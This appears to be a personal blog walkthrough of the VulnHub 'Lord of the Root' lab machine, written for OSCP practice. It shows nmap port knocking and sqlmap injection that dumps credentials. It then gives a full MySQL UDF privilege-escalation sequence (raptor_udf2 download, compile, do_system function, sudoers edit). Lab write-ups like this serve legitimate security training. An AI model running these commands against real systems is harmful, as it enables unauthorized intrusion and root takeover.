The machine

This machine is one of the machines from the OSCP preparation guide I received from one of my teachers. This machine is the next on list and it can be downloaded on: vulnhub

The challenge

The challenge or goal of the machine lists the following:

This is a boot-to-root machine will not require any guest interaction.

https://www.vulnhub.com/entry/lord-of-the-root-101,129/

Walk-through

The walk-through will be divided in a couple sections following the standard penetration testing process: Information gathering –> Exploitation –> Post exploitation. It could be divided into more steps, but for complicity we do these three.

Information gathering

To start of we will find the IP address of the machine with nmap since netdiscover takes a while on my VMware. We will use the command sudo nmap -sn 192.168.0.0/24 for this. The vulnerable machine has the IP 192.168.0.136.

So to start of the machine we scan the machine for open ports with nmap. We will do two scans; sudo nmap -sV -sC 192.168.0.136 -oA nmap and sudo nmap -sV -sC 192.168.0.136 -p- -oA fullnmap. We use these parameters for;
-sV service and version enumeration,
-sC is for basic script usage.
-p- to do a full port scan.
-oA to save all output to a couple different files.

The nmap results are;

So we only got the SSH service open. Once we SSH ssh 192.168.0.136 to the server to get the banner is shows us LOTR, knok friend to enter

I did this machine before and it was annoying, I could not do it. But I remember, we have to use a scanning tool that knocks on port 1,2,3 in this order. So I scanned the machine a couple times with nmap -r -p 1,2,3 192.168.0.136. With -r do not randomize and -p to specify port 1, 2 and 3.

After that we did another full port scan and we found the following results:

An apache web server on port 1337. Lets start our vulnerability scan nikto and our directory fuzzer dirb. nikto -host http://192.168.0.136:1337 -output=nikto.txt and dirb http://192.168.0.136:1337 -o dirb.txt.

Dirb only found a couple directories:

The mainwebpage shows us a meme:

Nothing interesting in the http source code:

In the /images/ directory are three memes present. The one we saw earlier and two other. With nothing of interest again. In the webpage /server-stat we get an 403 forbidden response.

Nikto shows us the webserver is using an old Apache version and it’s running on ubuntu.

I went to the browser and manually checked the /robots.txt file. There is an image. So I checked the source code and found the following:

An encoded string. Might be a hash. So I checked it in hash-identifier and it tells us it might be a tiger-192 or haval192 hash.

I could not find the hash value, maybe its just decoded. So I parsed it through some things like ROT1-24 and Base64 and it was base64 decoded. You can decode base64 in the terminal with the base64 -d command.

It gave us an webpage. If you browse to this webpage it gives you and login screen.

So I tried some basic SQL injections but it didn’t work. Like ' or 1=1# and ' or 1=1 --. We don’t have any other entry points in the vulnerable machine, like no other ports, no other webpages. I booted up sqlmap. To easily use it we started up burp, filled in the form and saved the request to a file named request. By clicking on save item after going to the request.

Exploitation

This file then can be used in SQLmap instead of setting the parameters and the post method. So I ran sqlmap with the following command: sqlmap -r Request --dbs --level=4 --risk=2 and it found a vulnerable parameter and gave us the following four databases.

So we want to find out what is in the Webapp database. We can use the following command to select the Webapp database sqlmap -r Request --dbs --level=4 --risk=2 -D Webapp -tables. It gave us one table, named Users.

Lets select this table and see what is in there.

We got three columns; id, password and username. We can use the following command to both dump the username and the password. sqlmap -r Request --dbs --level=4 --risk=2 -D Webapp -T Users -C username,password --dump. It gave us the following accounts:

gimli :AndMyAxe
legolas:AndMyBow
aragorn:AndMySword
frodo:iwilltakethering
smeagol:MyPreciousR00t

So I tried SSH’ing into the server and could only log in with the smeagol account

Privilege escalation

While looking around for a privilege escalation technique I saw that multiple services are running as root. Apache, mysql etc.

In the webdirectory /var/www/978345210 we found the file login.php containing mysql credentials.

I also checked if we could write anything to these folders or files. But unfortunately we could not. Would be an easy reverse shell ^^ With the command mysql -u root -p and the password darkshadow we could login to the mysql database. I can stop the sqlmap since I was checking the other databases in the meantime. So I found an exploit we can use to get root access.

So lets do this exploit. First we have to download it with wget https://www.exploit-db.com/raw/1518. Following the commented exploit steps inside the exploit its easier to rename it to raptor_udf2.c. Compiling the exploit gcc -g -c raptor_udf2.c gcc -g -shared -Wl,-soname,raptor_udf2.so -o raptor_udf2.so raptor_udf2.o -lc, log back in to the database mysql -u root -p with the password darkshadow. Then we issue the following mysql commands:

mysql> use mysql;
mysql> create table foo(line blob);
mysql> insert into foo values(load_file('/home/smeagol/raptor_udf2.so'));
mysql> select * from foo into dumpfile '/usr/lib/mysql/plugin/raptor_udf2.so'; 
mysql> create function do_system returns integer soname 'raptor_udf2.so';
mysql> select * from mysql.func;
+-----------+-----+----------------+----------+
| name      | ret | dl             | type     |
+-----------+-----+----------------+----------+
| do_system |   2 | raptor_udf2.so | function |
+-----------+-----+----------------+----------+
mysql> select do_system('id > /tmp/out; chown raptor.raptor /tmp/out');
mysql> \! sh
$ cat /tmp/out
uid=0(root) gid=0(root) groups=0(root)
mysql> select do_system('echo "smeagol ALL =(ALL) NOPASSWD: ALL" >> /etc/sudoers')
mysql> exit
Bye
smeagol@LordOfTheRoot:~$ sudo su
root@LordOfTheRoot:/home/smeagol# id && whoami
uid=0(root) gid=0(root) groups=0(root)
root
root@LordOfTheRoot:/home/smeagol# 

Dammn the mysql priv esc took me some time, way longer then expected. But I had to figure out how it worked and all to get it working and found some errors on the way while doing “create function do_system returns integer soname ‘raptor_udf2.so’;” It all worked when I did it in smeagol’s home directory instead of /tmp. Even had to reset the machine two times to start over.

Flag

Leave a Reply

Your email address will not be published. Required fields are marked *